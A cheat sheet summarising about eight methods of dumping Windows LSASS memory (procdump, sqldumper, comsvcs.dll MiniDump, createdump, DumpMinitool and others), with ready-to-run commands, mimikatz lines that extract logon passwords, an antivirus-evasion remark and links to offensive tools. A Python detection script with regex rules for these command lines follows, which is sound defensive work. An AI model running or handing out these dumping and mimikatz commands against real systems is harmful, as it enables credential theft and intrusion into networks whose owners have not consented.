Summary of LSASS process dump methods

  1. procdump: dump process memory to a dmp file
procdump64.exe -accepteula -ma lsass.exe C:\programdata\lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"
  2. sqldumper: dump process memory to a dmp file
  • Method 1:
tasklist /svc |findstr lsass.exe
sqldumper.exe [lsass PID] 0 0x01100
  • Method 2:
for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do sqldumper.exe %i 0 0x01100
  • Read the mdmp file with mimikatz:
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"
  3. avdump64: dump process memory to a dmp file
for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do powershell -c ".\AvDump_64.exe --pid %i --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file c:\programdata\lsass.dmp"
  4. .NET createdump: dump process memory to a dmp file
.NET 5 download URL
https://download.visualstudio.microsoft.com/download/pr/f05c10fe-fed3-43b6-b676-ff75021c2d9f/15cab750af61a29d70ef33c265354cf2/dotnet-runtime-5.0.3-win-x64.exe
Path of the tool after a successful installation
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.3\createdump.exe
tasklist /svc | findstr lsass    // look up the PID of the lsass process

PsExec.exe -s -i -d cmd.exe    // obtain a SYSTEM shell

"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.3\createdump.exe"  -u -f C:\programdata\lsass.dmp pid

PowerShell can produce the dmp file directly
powershell -c ".\createdump.exe -u -f lsass.dmp pid"
  5. comsvcs.dll: dump process memory to a dmp file
powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\programdata\lsass.dmp full"
  • comsvcs.dll, with the PID taken from tasklist:
for /f "tokens=1,2 delims= " %A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do powershell -c "C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump %B lsass.dmp full"
  6. DumpMinitool: dump process memory to a dmp file
  • Ships with Visual Studio 2022, Microsoft-signed, not flagged by AV
C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe
for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do DumpMinitool.exe --file 1.txt --processId %i --dumpType Full
  7. SharpDump: dump process memory to a dmp file
for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do sharpDump.exe %i
  8. Other GitHub tools for dumping process memory to a dmp file
https://github.com/codewhitesec/HandleKatz

https://github.com/post-cyberlabs/Offensive_tools/tree/main/PostDump

https://github.com/helpsystems/nanodump

https://twitter.com/mrd0x/status/1460597833917251595 dump64.exe

https://github.com/itm4n/PPLdump
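For defenders, the process-creation command lines listed above are the most direct detection signal. The following Python is an added example (not code from the original page) that matches constructed sample log records against the command-line patterns of the tools in this summary; the log format, user names and PIDs are made up, and the tools that take only a PID are rated lower because the target process must be confirmed from a separate process-access record.

```python
import re

# Constructed sample process-creation records: "<time>|<user>|<command line>".
# The command lines follow the ones on this page; PIDs and users are invented.
SAMPLE_LOG = r"""
10:01:02|corp\jsmith|procdump64.exe -accepteula -ma lsass.exe C:\programdata\lsass.dmp
10:01:10|corp\jsmith|notepad.exe C:\users\jsmith\notes.txt
10:02:31|NT AUTHORITY\SYSTEM|sqldumper.exe 812 0 0x01100
10:03:05|corp\jsmith|powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\programdata\lsass.dmp full"
10:04:44|corp\jsmith|DumpMinitool.exe --file 1.txt --processId 812 --dumpType Full
10:05:12|corp\jsmith|"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.3\createdump.exe" -u -f C:\programdata\lsass.dmp 812
10:06:00|corp\jsmith|cmd.exe /c for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do sharpDump.exe %i
"""

# (rule name, severity, regex over the command line). "high" when the line itself
# names lsass or the comsvcs MiniDump export; "medium" when only a dump tool with a
# numeric/loop PID is seen and the target must be correlated with a process-access event.
RULES = [
    ("procdump_lsass", "high", re.compile(r"procdump(64)?(\.exe)?.*\s-ma\s+lsass", re.I)),
    ("comsvcs_minidump", "high", re.compile(r"comsvcs\.dll\s*,\s*MiniDump\b", re.I)),
    ("tasklist_lsass_loop", "high", re.compile(r"tasklist\b.*IMAGENAME\s+eq\s+lsass", re.I)),
    ("sqldumper_dump", "medium", re.compile(r"sqldumper(\.exe)?\s+\d+\s+0\s+0x0*1100\b", re.I)),
    ("createdump_dump", "medium", re.compile(r'createdump(\.exe)?"?\s+-u\s+-f\s', re.I)),
    ("dumpminitool_full", "medium", re.compile(r"dumpminitool(\.exe)?.*--dumpType\s+Full", re.I)),
    ("avdump_dump", "medium", re.compile(r"avdump(_64)?(\.exe)?.*--dump_file", re.I)),
    ("sharpdump", "medium", re.compile(r"sharpdump(\.exe)?\s+(%i|\d+)", re.I)),
]

def classify(cmdline):
    """Return the (rule, severity) pairs whose pattern matches one command line."""
    return [(name, sev) for name, sev, rx in RULES if rx.search(cmdline)]

def scan(log_text):
    """Parse pipe-delimited records and return hits as (time, user, rule, severity)."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, cmd = line.split("|", 2)
        for name, sev in classify(cmd):
            hits.append((ts, user, name, sev))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The for-loop wrappers shown on this page are logged as a single cmd.exe command line, which is why the tasklist rule fires on the parent while the tool rule fires on the child process with the resolved PID.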